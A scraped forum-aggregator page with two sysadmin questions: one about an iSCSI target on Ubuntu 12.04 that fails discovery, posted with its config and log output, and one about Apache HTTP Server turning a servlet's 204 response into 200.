    I'm trying to setup iscsitarget on Ubuntu 12.04 but I can't connect to it. On the windows machine it says Target Error. with no other output. My ietd.conf is Target iqn.2012-06.com.org:virtual_machines.lun Lun 0 Type=fileio,Path=/media/volume0/storlun0.bin When I run iscsiadm -m discovery -t st -p localhost The output is iscsiadm: Connection to Discovery Address 127.0.0.1 failed iscsiadm: Login I/O error, failed to receive a PDU iscsiadm: retrying discovery login to 127.0.0.1 iscsiadm: Connection to Discovery Address 127.0.0.1 closed iscsiadm: Login I/O error, failed to receive a PDU iscsiadm: retrying discovery login to 127.0.0.1 iscsiadm: Connection to Discovery Address 127.0.0.1 failed iscsiadm: Login I/O error, failed to receive a PDU iscsiadm: retrying discovery login to 127.0.0.1 iscsiadm: Connection to Discovery Address 127.0.0.1 failed iscsiadm: Login I/O error, failed to receive a PDU iscsiadm: retrying discovery login to 127.0.0.1 iscsiadm: Connection to Discovery Address 127.0.0.1 failed iscsiadm: Login I/O error, failed to receive a PDU iscsiadm: retrying discovery login to 127.0.0.1 iscsiadm: connection login retries (reopen_max) 5 exceeded iscsiadm: Could not perform SendTargets discovery. dmesg output: [ 3324.804665] iscsi_trgt: Removing all connections, sessions and targets [ 3325.875343] iSCSI Enterprise Target Software - version 1.4.20.3 [ 3325.875415] iscsi_trgt: Registered io type fileio [ 3325.875420] iscsi_trgt: Registered io type blockio [ 3325.875425] iscsi_trgt: Registered io type nullio

    Read the article

  • Prevent apache http server changing response code

    - by Brad
    Hi all, I have a servlet providing a REST based service running on tomcat which I am accessing through Apache Http Server v2.2. My problem is that a response code for one for the service methods is being changed when it passes through http server. I have a curl script which I use to test the service. It is supposed to return a 204 No content response which it does when I hit the servlet directly. When I hit Apache with the script the response gets changed to a 200 Ok. Can anyone with experience of configuring Apache advise me how to fix this? Thanks, Brad.

    Read the article

< Previous Page | 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143  | Next Page >